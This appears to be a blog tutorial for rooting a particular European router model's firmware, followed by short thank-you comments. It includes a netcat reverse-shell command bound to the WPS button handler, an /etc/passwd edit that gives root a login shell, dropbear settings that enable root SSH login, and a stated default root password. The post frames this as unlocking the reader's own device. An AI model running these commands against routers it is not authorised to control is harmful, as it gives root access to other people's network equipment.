Unfortunately this will only work on European models that have SSH enabled with an engineer account enabled.
Tested working on firmware revision 17.2.0278
It's a bit more involved than the older methods but here goes:
First set up a machine listening with netcat (make a note of it's IP)
nc -lvvp 4444
Set up the WPS button to connect back to your listening machine. Log into the engineer account using SSH. Password is printed on the label as access code.
get uci.button.button.@wps.handler
set uci.button.button.@wps.handler 'nc <IP ADDRESS> 4444 -e /bin/sh'
get uci.button.button.@wps.handler
Push the WPS button on the router (on the 589 it's the one on the side, visible in the image up top)
Congrats, you now have a root shell.
Once logged in you can set up root login via ssh. The following will read the passwd file, then modify the root shell from /bin/false to /bin/ash
cat /etc/passwd
sed -i "1s/\/bin\/false/\/bin\/ash/" /etc/passwd
cat /etc/passwd
Make sure the 2nd output of the passwd file has the correct root shell.
Next, configure dropbear to allow root login via SSH
uci set dropbear.lan.RootLogin='1'
uci set dropbear.lan.RootPasswordAuth='on'
uci commit
You have to restart dropbear
/etc/init.d/dropbear restart
root password is root :)
Login via SSH, set new root password
root@dsldevice:~# passwd root
New password:
Retype password:
Password for root changed by root
Set WPS button back using UCI
uci set button.wps.handler='wps_button_pressed.sh'
uci commit
This is neat. Thanks, mate.
ReplyDeleteThis is neat. Thanks, mate.
ReplyDeleteThanks dude
ReplyDelete